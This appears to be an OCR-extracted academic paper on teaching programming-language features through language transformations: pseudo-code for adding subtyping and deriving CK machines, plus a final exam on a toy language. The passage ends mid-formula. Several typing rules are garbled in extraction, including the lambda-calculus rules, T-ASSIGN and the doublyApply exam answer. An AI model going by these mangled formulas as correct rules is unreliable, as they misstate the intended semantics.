49658, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 49658, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 49658, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 49658, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 49658, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 49658, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 49658, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 49658, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 49658, null]], "pdf_page_numbers": [[0, 78, 1], [78, 289, 2], [289, 840, 3], [840, 840, 4], [840, 2677, 5], [2677, 5562, 6], [5562, 8817, 7], [8817, 11161, 8], [11161, 13581, 9], [13581, 17123, 10], [17123, 17915, 11], [17915, 21480, 12], [21480, 24967, 13], [24967, 25256, 14], [25256, 26512, 15], [26512, 30148, 16], [30148, 32097, 17], [32097, 35460, 18], [35460, 38063, 19], [38063, 40034, 20], [40034, 43554, 21], [43554, 44710, 22], [44710, 46313, 23], [46313, 49304, 24], [49304, 49658, 25]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 49658, 0.01951]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
83c4895818488452758980f4d779493dade6cc4a
|
Language Transformations in the Classroom
Matteo Cimini
University of Massachusetts Lowell
Lowell, Massachusetts, USA
matteo_cimini@uml.edu
Benjamin Mourad
University of Massachusetts Lowell
Lowell, Massachusetts, USA
benjamin_mourad@student.uml.edu
Language transformations are algorithms that take a language specification in input, and return the language specification modified. Language transformations are useful for automatically adding features such as subtyping to programming languages (PLs), and for automatically deriving abstract machines.
In this paper, we set forth the thesis that teaching programming languages features with the help of language transformations, in addition to the planned material, can be beneficial for students to help them deepen their understanding of the features being taught.
We have conducted a study on integrating language transformations into an undergraduate PL course. We describe our study, the material that we have taught, and the exam submitted to students, and we present the results from this study. Although we refrain from drawing general conclusions on the effectiveness of language transformations, this paper offers encouraging data. We also offer this paper to inspire similar studies.
1 Introduction
Computer Science university curricula include undergraduate courses in programming languages (PLs). These courses vary greatly in the content they offer, and they may also have various names such as “Principles of Programming Languages”, and “Organization of Programming Languages”, to make some examples. Typically, the goal of these courses is not to teach one specific PL. Conversely, students are exposed to the conceptual building blocks from which languages are assembled, the various programming paradigms that exist, and students are challenged to think about various PL features in their generality.
It is typical for these courses to cover PL features such as subtyping, abstract machines, type inference, parametric polymorphism, as well as many others. Some of these features can be regarded as variations on a base PL. For example, it is not uncommon to design a PL, and add subtyping afterwards. It is then interesting to understand what are the modifications that need to take place in order to incorporate subtyping in that base language. A good way to analyze this is by looking at how formal typing rules need to change. Consider, for example, the typing rule of function application below on the left, and its version with (algorithmic) subtyping on the right.
\[
\begin{align*}
(T\text{-}\text{APP}) & \quad \Gamma \vdash e_1 : T_1 \rightarrow T_2 \\
& \quad \Gamma \vdash e_2 : T_1 \\
& \quad \Gamma \vdash e_1 e_2 : T_2 \\
(T\text{-}\text{APP}') & \quad \Gamma \vdash e_1 : T_{11} \rightarrow T_2 \\
& \quad \Gamma \vdash e_2 : T_{12} <: T_{11} \\
& \quad \Gamma \vdash e_1 e_2 : T_2
\end{align*}
\]
\( (T\text{-}\text{APP}) \) rejects programs that pass an integer to a function that works on floating points, such as the program \((\lambda x : \text{float}. x) 3\), where \(0 \vdash 3 : \text{int}\). This is because the type \(T_1\) in \(T_1 \rightarrow T_2\), which is the...
domain of the function \(e_1\), needs to be the exact same type \(T_1\) of the argument \(e_2\). If we were to add subtyping, such a parameter passing would be accepted by the type system.
The first modification that \((T\text{-APP'})\) makes of \((T\text{-APP})\) is to let the domain of the function and the argument have different types. To do so, \((T\text{-APP'})\) assigns two different variables to the two occurrences of \(T_1\), that is, \(T_{11}\) for the domain of the function, and \(T_{12}\) for the type of the argument. Next, \((T\text{-APP'})\) needs to understand how \(T_{11}\) and \(T_{12}\) are related by subtyping. As \(T_{11}\) appears in contravariant position in \(T_{11} \rightarrow T_2\), it means that \(T_{11}\) describes the type of an input. The argument \(e_2\) will be provided as a value. Therefore, it is the type \(T_{12}\) of the argument that must be a subtype of \(T_{11}\), rather than the other way around, for example. Hence, the subtyping premise \(T_{12} <: T_{11}\) is added to \((T\text{-APP'})\).
We can describe these modifications with an algorithm that takes \((T\text{-APP})\), and automatically transforms it into \((T\text{-APP'})\). To summarize, such an algorithm must perform two steps:
- **Step 1**: Split equal types into fresh, distinct variables, and
- **Step 2**: Relate these new variables by subtyping according to the variance of types.
This type of algorithm can be formulated over a formal data type for language specifications. In other words, we can devise a procedure that takes a language specification in input (as a data type), and returns another language specification (with subtyping added). These algorithms are called *language transformations* [18]. One of the benefits of language transformations is that they do not apply just to one language. Instead, they can apply to several languages. For example, the two steps above can add subtyping for types other than the function type, such as pairs, lists, option types, and other simple types.
### Our Thesis
Another benefit of language transformations is that they highlight the central insights behind a feature being added. For example, **Step 1** and **Step 2** are key aspects of subtyping. Teaching students the algorithms that automatically apply **Step 1** and **Step 2** to languages can provide them with a firmer grasp of the concept of subtyping overall.
The approach is not limited to subtyping. The adding of other PL features can be formulated as language transformations, and taught to students in class as well. We think that exposing students to the language transformations for adding PL features may constitute a good addition in the classroom.
In this regard, however, we point out that we do not advocate for teaching PL features exclusively with the sole help of language transformations. For example, we teach subtyping using the material in the TAPL textbook [19], and we are skeptical that it would be a good idea to skip this material before introducing language transformations. This is because language transformations constitute quite a technical deep dive, and students could benefit from a gentler introduction of PL concepts.
Ultimately, in this paper we set forth the thesis that *using language transformations for teaching PL features, in addition to the planned material, can be beneficial for students to deepen their understanding of the features being taught.*
### Contributions of this Paper
We have experimented with teaching the language transformations for adding subtyping and deriving CK abstract machines [14]. We have conducted our study on two instances of an undergraduate course on programming languages.
In class, we first have introduced subtyping with material from TAPL [19], as mentioned above, and then we have taught the language transformations for adding subtyping (which we describe in Section 2.1). To evaluate whether our students gained a good understanding of subtyping, the final exam presented them with a language with operators that are not standard. Then, the exam asked students to add subtyping to these operators based on the language transformations that they have learned.
In the context of this study, we have collected information about students’ success in providing a correct answer to such a task. We describe the final exam in detail in Section 2.3, and we report on the results of this study in Section 3.
We have taught the topic of CK machines following the notes of Felleisen and Flatt [14]. We then have taught the language transformations for deriving CK machines (which we describe in Section 2.2). Analogously to subtyping, the final exam asked our students to derive the CK machine for a language with operators that are not standard. We then have collected information about students’ exam answers for this task, and we report on this data in Section 3. In total, the study involved 55 undergraduate students.
To summarize our contributions, in this paper:
• We set forth the thesis that language transformations can be a beneficial addition in PL courses, as formulated above.
• We describe the study that we have conducted, which includes the material that we have taught, and the exam submitted to the students.
• We present the results from our study. Although we explicitly say that we should not consider our results conclusive, the data that we present is encouraging.
• We offer this paper to inspire similar studies towards gathering evidence for, or against, our thesis.
Roadmap of the Paper Section 2 describes the study that we have conducted, Section 3 presents our results, Section 4 describes our future work, and Section 5 concludes the paper.
2 Language Transformations in Class
General Details about the Course The course is at the undergraduate level, and is based on the TAPL textbook [19]. The course covers the typical topics of PL theory on defining syntax (BNF grammars), operational semantics, and type systems of PLs. The course also covers several other topics such as parameter passing, scoping mechanisms, subtyping, abstract machines, recursion, exceptions, dynamic typing, memory management, concurrency, and logic programming. Students are then familiar with the formalisms of operational semantics and type systems when the course covers the topics of subtyping and abstract machines.
The evaluations of the course include a long-term programming project in which students develop an interpreter for a functional language with references in OCaml, and a final exam with questions and open answers at the end of the course. The final exam tests our students on the topics of subtyping and abstract machines. We will describe our exam in Section 2.3.
Algorithms in Pseudo-Code Language transformations are algorithms, which begs the question on what syntax we should use to describe them. We took inspiration from courses in Algorithms and Data Structures, and from textbooks such as [10], where algorithms are described in pseudo-code. Therefore, we have used a pseudo-code that, to our estimation, was always intuitive to students, even though we did not thoroughly and precisely define it (as in [10]).
**Language Specifications** During the course, students acquire familiarity with formal definitions of programming languages, which they learn through TAPL. To recap, languages are defined with a BNF grammar and a set of inference rules. Inference rules are used to define a type system, a reduction relation, and auxiliary relations, if any. To make an example, we repeat the typical formulation of the simply-typed λ-calculus. We use a small-step operational semantics and evaluation contexts.
(Below, \( B \) is some base type.)
\[
\begin{align*}
\text{Type} & : \quad T \ ::= \ T \to T \ | \ B \\
\text{Expression} & : \quad e \ ::= \ x \ | \ \lambda x : T . e \ | \ e \ e \\
\text{Value} & : \quad v \ ::= \ \lambda x : T . e \\
\text{Evaluation Context} & : \quad E \ ::= \ [\emptyset] \ | \ E \ e \ | \ v E \\
\text{Type Environment} & : \quad \Gamma \ ::= \ \emptyset \ | \ \Gamma , x : T \\
\end{align*}
\]
\[
\begin{align*}
\Gamma \vdash x : T & \quad x : T \in \Gamma \\
\Gamma \vdash (\lambda x : T . e) : T_1 \to T_2 & \quad \Gamma , x : T_1 \vdash e : T_2 \\
\Gamma \vdash e_1 : T_{11} \to T_{12} & \quad \Gamma \vdash e_2 : T_{12} \\
((\lambda x : T . e) v) & \longrightarrow e[v/x] \\
\end{align*}
\]
\[
\begin{align*}
\Gamma \vdash e \longrightarrow e' & \quad E \longrightarrow E'[e'] \\
\end{align*}
\]
We allow our pseudo-code to refer to parts of a language specification. For example, if the language \( L \) is the formulation of the simply-typed \( \lambda \)-calculus, then it contains both the grammar and the set of inference rules above. \( L.rules \) retrieves the set of inference rules. Given a rule \( r \), say \( (T\text{-APP}) \), \( r.premises \) retrieves the set of premises of \( (T\text{-APP}) \), which are the formulae above the horizontal line. \( r.conclusion \) retrieves the formula below the horizontal line. To our estimation, these references in the pseudo-code, as well as all other references, are rather intuitive, and they will be clear when we use them. (This is also the take on pseudo-code that [10] has, where a number of operations are not defined beforehand.)
**Roadmap of this Section** Below, we describe our experiment on teaching subtyping (Section 2.1) and CK machines (Section 2.2). We also describe the final exam given to students (Section 2.3). Our pseudo-code for adding subtyping is based on an algorithm expressed in a domain-specific language in [18]. We are not aware of any analogous algorithm that corresponds to our pseudo-code for deriving CK machines. The next sections describe the algorithms that we have taught in class, of which we do not claim any theoretical results of correctness.
### 2.1 Language Transformation for Subtyping
In class, we have taught subtyping based on the corresponding chapters in the TAPL textbook [19]. Then, we have taught language transformation algorithms for adding subtyping to simple functional languages. The task of adding subtyping has been divided into the two steps that we have discussed in the introduction: 1) Split equal types, and 2) Relate new variables by subtyping according to the variance of types.
**Split Equal Types** This step modifies the typing rules of a language so that the variables that occur more than once in their premises are given different variable names. As we have seen in the introduction, this is the first step to let different expressions have different types. We define the procedure
**SPLIT-EQUAL-TYPES** to perform this step. The pseudo-code of **SPLIT-EQUAL-TYPES** is given below, which we explain subsequently.
**SPLIT-EQUAL-TYPES** \((P)\)
1. \(\text{newPremises} = \emptyset, \text{varmap} = \emptyset\)
2. \textbf{for each} \(p \in P\) \textbf{if} \(p\) is of the form \(\Gamma \vdash e : \text{someType}\)
3. \hspace{1em} \textbf{for each} \(T \in \text{someType}\) s.t. \(T\) appears more than once in \(P\)
4. \hspace{2em} \(T' = \text{FRESH}(P)\)
5. \hspace{2em} \(p = p\) \textbf{where} \(T'\) replaces \(T\) in \(\text{someType}\)
6. \hspace{2em} \(\text{varmap}(T) = \text{varmap}(T) \cup \{T'\}\)
7. \hspace{1em} \(\text{newPremises} = \text{newPremises} \cup \{p\}\)
8. \textbf{return} \((\text{newPremises}, \text{varmap})\)
**SPLIT-EQUAL-TYPES** takes a set of premises \(P\) in input, and returns a pair with two components: a set of premises \(\text{newPremises}\), and a map \(\text{varmap}\). Here, \(\text{newPremises}\) is the same set of premises \(P\) in which each variable has been given fresh, distinct names, if occurring multiple times. \(\text{varmap}\) maps each of the variables that have been replaced to the set of new variables that replaced them. The reason for collecting these new variables in \(\text{varmap}\) is because we need to relate them by subtyping. (This is the responsibility of the second step, which works based on the information in \(\text{varmap}\).)
To make an example, when **SPLIT-EQUAL-TYPES** is applied to the premises of (\text{T-APP}), we have
**Input:** \(P = \{\Gamma \vdash e_1 : T_1 \rightarrow T_2, \Gamma \vdash e_2 : T_1\}\)
**Output** = \((\text{newPremises}, \text{varmap})\) where
\[
\begin{align*}
\text{newPremises} &= \{\Gamma \vdash e_1 : T_{11} \rightarrow T_2, \Gamma \vdash e_2 : T_{12}\} \\
\text{varmap} &= \{T_1 \mapsto \{T_{11}, T_{12}\}\}
\end{align*}
\]
**SPLIT-EQUAL-TYPES** produces this output in the following way. Line 1 initializes \(\text{newPremises}\) to the empty set, and \(\text{varmap}\) to the empty map. The loop at lines 2-8 is executed for each premise \(p\) of the set of premises \(P\). For example, with (\text{T-APP}) we have two iterations; the first is with \(p = \Gamma \vdash e_1 : T_1 \rightarrow T_2\), and the second is with \(p = \Gamma \vdash e_2 : T_1\). Line 3 extracts the components of the typing premise. It does so in a style that is reminiscent of pattern-matching. The component that is relevant for the algorithm is \(\text{someType}\), which is the output type of the typing premise. The loop at lines 4-7 applies to each variable \(T\) in \(\text{someType}\) that appears more than once in the premises of \(P\). We focus on variables that have multiple occurrences because variables that occur only once do not need to be replaced with new names. For each of these variables \(T\), we generate a fresh variable that is not used in \(P\). We do so with \(\text{FRESH}(P)\) at line 5. Line 6 modifies the premise \(p\) by rewriting it to use the fresh variable in lieu of \(T\). Line 7 also updates \(\text{varmap}\) to add the fresh variable to the set of new variables mapped by \(T\). Line 8 adds \(p\) to \(\text{newPremises}\). At that point, \(p\) may have been modified with line 6, or may have remained unchanged. Finally, line 9 returns the pair \((\text{newPremises}, \text{varmap})\).
**Relate New Variables by Subtyping** This second step is performed in the context of the procedure **ADD-SUBTYPING**. This is our general procedure that takes a language specification in input, and adds subtyping to it. To do so, **ADD-SUBTYPING** calls **SPLIT-EQUAL-TYPES**, and then works on the rules modified by **SPLIT-EQUAL-TYPES** to relate the new variables by subtyping.
The pseudo-code of **ADD-SUBTYPING** is the following.
ADD-SUBTYPING($L$)
for each rule $r \in L.rules$ s.t. $r$conclusion is of the form $\Gamma \vdash e : \text{someType}$
(newPremises, varmap) = SPLIT-EQUAL-TYPES(r.premises)
for each mapping $(T \mapsto \text{setOfNewVars})$ in varmap
if there exists a type in setOfNewVars that is invariant in newPremises
for each $T_1, T_2 \in \text{setOfNewVars}$
newPremises = newPremises $\cup \{T_1 = T_2\}$
elseif there is exactly one type $T'$ in setOfNewVars that is contravariant in newPremises
for each $T_{\text{new}} \in (\text{setOfNewVars} \setminus T')$
newPremises = newPremises $\cup \{T_{\text{new}} <: T'\}$
elseif none in setOfNewVars is contravariant or invariant in newPremises
say that setOfNewVars = $\{T_1, T_2, \ldots, T_n\}$
newPremises = newPremises $\cup \{T = T_1 \lor T_2 \lor \ldots \lor T_n\}$
else error
r.premises = newPremises
The argument $L$ is the language specification in input. The procedure modifies the rules of $L$ in place. Line 1 selects only the typing rules of $L$ (leaving out reduction rules, for example). It does so by selecting only the rules whose conclusion has the form of a typing formula. Lines 2-14 constitute the body of the loop, and apply for each of these rules. Line 2 calls SPLIT-EQUAL-TYPES, passing the premises of the typing rule as argument. This call returns the new premises and the map previously described. Lines 3-13 iterate over the key-value pairs of the map. Key-value pairs are of the form $T \mapsto \text{setOfNewVars}$, where $T$ is the variable that occurred in the original typing rule before calling SPLIT-EQUAL-TYPES. We dub $T$ as the original variable. Also, setOfNewVars contains the new variables generated by SPLIT-EQUAL-TYPES for $T$.
Lines 4-6 cover the case for when the original variable appeared in invariant position. In that case, there exists a variable in setOfNewVars that is in invariant position in newPremises, which we check with line 4. As the original variable appeared in invariant position, all the new variables must be related by equality. (We make an example shortly). Therefore, lines 5-6 add an equality premise for every two variables in setOfNewVars. This case covers operators such as the assignment in a language with references, as $T$ is invariant in a reference type Ref $T$. Consider the typing rule for the assignment operator on the left, and its version with subtyping on the right.
\[
\begin{align*}
\Gamma \vdash e_1 : \text{Ref } T & \quad \Gamma \vdash e_2 : T \\
\Gamma \vdash e_1 := e_2 : \text{unitType} & \quad \Rightarrow \quad \\
\Gamma \vdash e_1 := e_2 : \text{unitType} & \quad \text{(T-ASSIGN)}
\end{align*}
\]
Here, SPLIT-EQUAL-TYPES replaces $T$ with two new variables $T_1$ and $T_2$, but as $T$ is invariant in (T-ASSIGN), we generate the premise $T_1 = T_2$, which is the correct outcome.
Lines 7-9 cover the case for when the original variable appeared in a contravariant position. In that case, there exists a type $T'$ in setOfNewVars that is contravariant in newPremises. We detect such a case with line 7. Notice that line 7 also checks that the original variable appeared only once in contravariant position. We address this aspect later when we discuss line 13. As $T'$ appears in contravariant position, this is an input that is waiting to receive values. Therefore, we generate the subtyping premises that set all the other new variables in setOfNewVars as subtypes of $T'$ (lines 8-9). This case covers operators such
as the function application, which we have discussed previously. Thanks to lines 7-9, ADD-SUBTYPING generates the typing rule \((T\text{-APP'})\) from \((T\text{-APP})\), which is the correct outcome.
Lines 10-12 cover the case in which variance does not play a role. In this case, all the newly generated variables are peers. (We will make an example shortly). Therefore, we compute the join \(\lor\) for them [19]. This case applies to operators such as if-then-else. Consider the typing rule of if-then-else below on the left, and its version with subtyping on the right.
\[
\frac{(T\text{-IF})}{\Gamma \vdash e_1 : \text{Bool} \quad \Gamma \vdash e_2 : T \quad \Gamma \vdash e_3 : T} \quad \frac{(T\text{-IF}')}{\Gamma \vdash e_1 : \text{Bool} \quad \Gamma \vdash e_2 : T_1 \quad \Gamma \vdash e_3 : T_2} \quad T = T_1 \lor T_2 \quad \Gamma \vdash (\text{if } e_1 \ e_2 \ e_3) : T
\]
Here, SPLIT-EQUAL-TYPES replaces \(T\) with two new variables \(T_1\) and \(T_2\). Then, line 10 detects that variance does not play a role for these new variables. Indeed, the two branches of the if-then-else are peers. Therefore, lines 11 and 12 generate the premise that computes the join of all the new variables, and assign it to \(T\). Thanks to lines 10-12, \((T\text{-IF'})\) is precisely the typing rule that ADD-SUBTYPING generates, which is the correct outcome. Another example where variables are peers is with the case operator of the sum type.
Line 13 throws an error if none of the previous cases apply. This happens, for example, if a variable appears in contravariant position multiple times in the typing rule. Consider the following typing rule.
\[
\Gamma \vdash e_1 : T \to (T \to \text{Bool}) \quad \Gamma \vdash e_2 : T \times T \quad \Gamma \vdash \text{app2 } e_1 \ e_2 : \text{Bool}
\]
Here, \(T\) appears in contravariant position twice in the type of \(e_1\). However, the typing rule of app2 cannot distinguish how the components of the pair \(e_2\) are going to be used. Consider two alternative reduction rules for app2:
\[
\text{app2 } e_1 \ e_2 \longrightarrow ((e_1 \ (\text{fst } e_2)) \ (\text{snd } e_2)) \quad \text{or} \quad \text{app2 } e_1 \ e_2 \longrightarrow (((e_1 \ (\text{snd } e_2)) \ (\text{fst } e_2))
\]
The reduction rule on the left entails that the first component of the pair \(e_2\) must be subtype of the first \(T\) of \(T \to (T \to \text{Bool})\), and that the second component of the pair \(e_2\) must be subtype of the second \(T\) of \(T \to (T \to \text{Bool})\). Conversely, the reduction rule on the right entails that the second component of the pair \(e_2\) must be subtype of the first \(T\) of \(T \to (T \to \text{Bool})\), and that the first component of the pair \(e_2\) must be subtype of the second \(T\) of \(T \to (T \to \text{Bool})\).
However, ADD-SUBTYPING only analyzes the typing rule of app2, which alone is not informative enough to tell about the parameter passing to \(e_1\). Therefore, we do not know what subtyping premises to generate. In this case, ADD-SUBTYPING throws an error.
To solve this problem, we could extend ADD-SUBTYPING to analyze the reduction semantics of app2, but we observe that language designers may specify such semantics in a way that is as complex as they wish. Reduction rules may not use parameter passing immediately and evidently, in favor of jumping from operator to operator several times, which makes the analysis hard to do. For these reasons, we have not investigated this path, also because we may be speaking about cases that are quite uncommon, and not strictly necessary to cover in detail in our undergraduate class.
Finally, line 14 replaces the premises of $r$ with $newPremises$. The relations $\lor$ and $<$ can be generated with an algorithm, too, but we omit showing these procedures here. In this paper, we simply want to illustrate the approach rather than strive for completeness.
### 2.2 Language Transformation for CK
We have taught abstract machines following the notes of Felleisen and Flatt [14]. To recap, the CK machine remedies an inefficiency aspect of the reduction semantics. Consider the following reductions:
- $(\text{hd} \ [f \land ((\lambda x. x) \ t), \ t]) \ e_1 \ e_2) \rightarrow (\text{hd} [f \land t, t]) e_1 e_2)$
- $(\text{if} (\text{hd} [f \land t, t]) e_1 e_2) \rightarrow \ldots$
To perform the step at the top, the reduction semantics traverses the term and seeks for the first available evaluation context, which points to the highlighted subterm. At the second step, the reduction semantics must seek again for an available evaluation context, and does so by traversing the term again from the top level if operator, which is inefficient.
To improve on this aspect, and avoid these recomputations, the CK machine carries a continuation data structure at run-time. The grammar for continuations, and the CK reduction rules for function application are the following.
$(\text{mt}$ is the empty continuation, which denotes machine termination.)
\[
\text{Continuation } k ::= \text{mt} \mid \text{app}_1 e \ k \mid \text{app}_2 v \ k
\]
\[
\begin{align*}
(\text{app} e e_2, k) & \rightarrow e, (\text{app}_1 e_2 k) & \text{Start} \\
\nu_1 (\text{app}_1 e \ k) & \rightarrow e, (\text{app}_2 v \ k) & \text{Order} \\
\nu_1 (\text{app}_2 (\lambda x. e) \ k) & \rightarrow e[v/x], k & \text{Computation}
\end{align*}
\]
The reduction relation has the form $e, k \rightarrow e, k$, where $k$ is built with continuation operators $\text{mt}$, $\text{app}_1$, and $\text{app}_2$. There is a continuation operator for each evaluation context. Each continuation operator has always an argument $k$, which is the next continuation, and one expression argument less than the operator because one of the expressions is currently out to be the focus of the evaluation. For example, $(\text{app}_2 v \ k)$ means that the current expression being evaluated returns as the second argument of the application, and $v$ is the function waiting for such argument.
Below, we show the language transformations for generating the CK machine, except for the procedure that generates the Computation rule above, because that procedure is straightforward.
#### Generating the Grammar for Continuations
The following pseudo-code generates the grammar Continuation.
```
CK-GENERATE-GRAMMAR(EvalCtx)
1 create grammar category Continuation, and add grammar item \text{mt} to it
2 for each \((\text{op} \ t_1 \ldots t_n) \in \text{EvalCtx}\)
3 if \(t_i = E\)
4 add grammar item \((\text{op}_i (t_1 \ldots t_n \text{ minus } E) \ k)\) to Continuation
```
For each evaluation context, the index where the $E$ appears determines the index of the continuation operator. The arguments of this operator are all the arguments that are not $E$. Indeed, the argument at that position will currently be the focus of the evaluation. Also, the next continuation $k$ is the last argument.
Generating the Start rule The following pseudo-code generates the reduction rule \texttt{Start}, which brings the computation of an operator into using continuation operators.
\begin{verbatim}
CK-GENERATE-START (Continuations)
1 find (op\_i \_t_1 \ldots \_t_n \_k) \in Continuations with no v
2 add reduction rule (op \_t_1 \ldots e \ldots \_t_n \_k) \rightarrow e, (op\_i \_t_1 \ldots \_t_n \_k)
\end{verbatim}
Here, \(e\) appears at position \(i\) in \(op\). If a continuation contains some \(v\) as arguments, it means that those arguments must have been the subject of some other evaluation context that evaluated them to a value. Therefore, that cannot be the starting point. Our starting point, instead, is a continuation that contains no \(v\). The reduction rule that we add takes the operator into using the continuation operator that we have just found.
Generating Order rules The following pseudo-code generates the reduction rules \texttt{Order}. These rules evaluate the arguments of the operator by jumping from one continuation operator to another in the order established by the evaluation contexts.
\begin{verbatim}
CK-GENERATE-ORDER (Continuations, EvalCtx)
1 for each (op\_i \_t_1 \ldots \_t_m \_k) \in Continuations
2 find (op \_t'_1 \ldots \_t'_n) \in EvalCtx where (t_k = t'_k or t'_k = E, for all k)
3 if t'_j = E
4 add reduction rule v, (op\_i \_t_1 \ldots \_t_m \_k) \rightarrow t_j, (op\_j \_t_1 \ldots v \ldots \_t_m \_k)
\end{verbatim}
Here, \(v\) appears at position \(i\) in \(op\_j\). After finishing an evaluation in the contexts of the continuation \(op\_i\), we need to find the next continuation operator \(op\_j\). To do so, we find a match between the arguments of the continuation \(op\_i\) with arguments of an evaluation context. This is because arguments that are values in the continuation then need to be values, too, in the next evaluation context. Arguments that are simply expressions \(e\) in the continuation then need to be expressions \(e\), too, in the next evaluation context. The evaluation context will have, however, an argument \(E\) (and only one argument \(E\)) at some position \(j\), which identifies the index of the next continuation operator. The reduction rule that we add starts from a point where a value has been computed, and we are in the context of the continuation \(op\_i\). In one step, we extract the \(j\)-th argument of the continuation \(op\_i\) because that is the expression that now needs to be in the focus of the evaluator. The next continuation is then \(op\_j\), where we placed the value \(v\) just computed among the arguments of \(op\_j\), and specifically at position \(i\).
Generating Computation rules is rather straightforward, hence we omit showing that simple procedure.
2.3 Final Exam
At the end of the course, students have been evaluated with a final exam. The final exam included questions about subtyping and CK machine\footnote{The final exam also contained questions about other topics of the course. For example, the final exam of the second iteration contained questions about garbage collection. However, here we focus only on the parts of the exam that concern language transformations.}. The goal is not to test students on the language transformations per se, but rather on their understanding of subtyping and the CK machine. We therefore tested whether students would be able to use their understanding in practice. Our questions tested students on whether,
if presented with a language with unusual operators, they would be able to add subtyping to it, and derive its CK machine.
We have delivered two iterations of the course. The final exam took place online on both iterations due to the COVID-19 pandemic. In the first iteration of the course, we have shared a link to a text file that contained the content of the exam, and students submitted an updated text file via email. In the second iteration, the text of the exam was uploaded in the Blackboard system. Students could insert their answers on the webpage as text, and submit them with the submit button.
The text of the final exam had two parts:
- The description of a toy language called **langFunny**.
- The questions that students were asked to answer, which referred to the language **langFunny**.
Below, we describe these two parts.
### The Toy Language langFunny
The text of the exam contained a description of **langFunny**. The text told the students that **langFunny** is a λ-calculus with pairs ⟨e₁, e₂⟩ and lists [e₁,...,eₙ], equipped with two operators called **doublyApply** and **addToPairAsList**, which we describe below. The text of the exam did not repeat the typing rules and reduction rules of the λ-calculus with pairs and lists because we have seen them extensively in class, and because they did not play a role in the questions of the exam.
On the contrary, the text of the exam provided the students with the formal semantics of **doublyApply** and **addToPairAsList**, which we will show shortly.
Below, we describe the operators **doublyApply** and **addToPairAsList**.
- **doublyApply**: The text of the final exam contained the following description of **doublyApply**.
"**doublyApply** takes two functions f₁ and f₂ in input, and two arguments a₁ and a₂, and creates the pair ⟨f₂(f₁(a₁)), f₁(f₂(a₂))⟩. That is, the first component of the pair calls f₁ with a₁ and passes the result to f₂, and the second component calls f₂ with a₂ and passes the result to f₁."
The text of the exam also provided the students with the following syntax, evaluation contexts, typing rule, and reduction rule for **doublyApply**.
**Expression**
\[
e ::\ldots | (\text{doublyApply } e \ e \ e \ e)
\]
**Evaluation Context**
\[
E ::\ldots | (\text{doublyApply } E \ e \ e \ e) | (\text{doublyApply } v \ E \ e \ e) \\
| (\text{doublyApply } v \ v \ E)
\]
\[
\Gamma \vdash e_1 : T_1 \rightarrow T_2 \quad \Gamma \vdash e_2 : T_2 \rightarrow T_1 \quad \Gamma \vdash e_3 : T_1 \quad \Gamma \vdash e_4 : T_2 \\
\Gamma \vdash (\text{doublyApply } e_1 \ e_2 \ e_3 \ e_4) : T_2 \times T_1
\]
**doublyApply** v₁ v₂ v₃ v₄ \rightarrow ⟨(v₂ (v₁ v₃)), (v₁ (v₂ v₄))⟩
- **addToPairAsList**: The text of the exam contained the following description of **addToPairAsList**.
"**addToPairAsList** takes an element a₁ and a pair p, and strives to add the element to the pair. As pairs contain only two elements, it creates a list with three elements: the element a₁, the first component of p, and the second component of p.”
To make a concrete example, we have **addToPairAsList** a₁ ⟨a₂,a₃⟩ = [a₁,a₂,a₃].
---
The text of the exam also provided the students with the following syntax, evaluation contexts, typing rule, and reduction rule for addToPairAsList.
| Expression | $e ::= \ldots | (\text{addToPairAsList } e\ e)$ |
|--------------|-----------------------------------------------|
| Evaluation Context | $E ::= \ldots | (\text{addToPairAsList } E e) | (\text{addToPairAsList } v\ E)$ |
\[
\Gamma \vdash e_1 : T \quad \Gamma \vdash e_2 : T \times T \\
\Gamma \vdash (\text{addToPairAsList } e_1\ e_2) : \text{List } T
\]
\[
\text{addToPairAsList } v_1\langle v_2, v_3\rangle \rightarrow [v_1, v_2, v_3]
\]
Although these operators are not extremely bizarre, it is unusual to see them as primitive operations.
Questions and their Challenges After the description of the language \texttt{langFunny}, the text of the exam gave the students three questions that they were asked to answer. We dub these questions “Subtyping of \texttt{doublyApply}”, “Subtyping of \texttt{addToPairAsList}”, and “CK for \texttt{doublyApply}”, respectively.
The question “Subtyping of \texttt{doublyApply}” asked the students to show the version of the typing rule of \texttt{doublyApply} with subtyping. This task is not trivial because the typing rule of \texttt{doublyApply} has three occurrences of $T_1$, and one of them is in contravariant position, which is the input of a function. Therefore, the other two occurrences of $T_1$ must be subtypes of that. The same scenario occurs for $T_2$.
The correct answer to this question is the following:
(The output type of this typing rule is more restrictive than necessary. The output type could be adjusted by applying another procedure, but we have omitted this part).
\[
\Gamma \vdash e_1 : T_1' \rightarrow T_2' \quad \Gamma \vdash e_2 : T_2 \rightarrow T_1' \\
\Gamma \vdash e_3 : T_2'' \quad \Gamma \vdash e_4 : T_2'' \\
T_1' <: T_1 \quad T_2'' <: T_1 \quad T_1' <: T_2 \quad T_2'' <: T_2 \\
\Gamma \vdash (\text{doublyApply } e_1\ e_2\ e_3\ e_4) : T_2 \times T_1
\]
The question “Subtyping of \texttt{addToPairAsList}” asked the students to show the typing rule of the operator \texttt{addToPairAsList} with subtyping added. This task is also non-trivial because there are three occurrences of $T$ that are peers. Therefore, the correct solution is to compute a join type.
The correct answer to this question is the following:
\[
\Gamma \vdash e_1 : T' \quad \Gamma \vdash e_2 : T'' \times T''' \\
T = T' \vee T'' \vee T''' \\
\Gamma \vdash (\text{addToPairAsList } e_1\ e_2) : \text{List } T
\]
The question “CK for \texttt{doublyApply}” asked the students to derive the CK machine for \texttt{langFunny} insofar as the reduction rules for \texttt{doublyApply} are concerned. This operator is challenging because it has a high number of arguments (four). To complete the task, students must understand well the relationship between continuations and the evaluation order of arguments.
The correct answer to this question is the following:
(\textit{doublyApply} e_1 e_2 e_3 e_4), k \rightarrow e_1, (\textit{doublyApply} e_2 e_3 e_4 k) & \text{Start} \\
